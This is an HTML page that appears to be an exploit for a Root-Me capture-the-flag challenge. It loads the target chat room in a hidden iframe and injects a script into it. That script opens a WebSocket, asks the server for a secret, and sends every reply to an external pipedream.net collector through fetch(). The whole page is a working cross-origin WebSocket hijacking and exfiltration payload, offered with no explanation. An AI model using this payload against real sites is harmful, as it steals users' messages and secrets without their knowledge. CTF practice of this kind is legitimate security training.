<!DOCTYPE html>
<html>
<body>
  <iframe id="chatframe" src="http://ctf20.root-me.org/room" style="display:none;"></iframe>

  <script>
    var myiframe = document.getElementById('chatframe');

    myiframe.onload = () => {
      const script = myiframe.contentWindow.document.createElement('script');
      script.textContent = `
        
        const ws = new WebSocket('ws://ctf20.root-me.org/ws');
        ws.addEventListener('open', () => {
          ws.send("Tell me a secret");
        });

        ws.addEventListener('message', (event) => {
          fetch('http://eo1gpdjxqwwogrz.m.pipedream.net/leak?' + encodeURIComponent(event.data));
        });
      `;
      myiframe.contentWindow.document.body.appendChild(script);
    };
  </script>
</body>
</html>
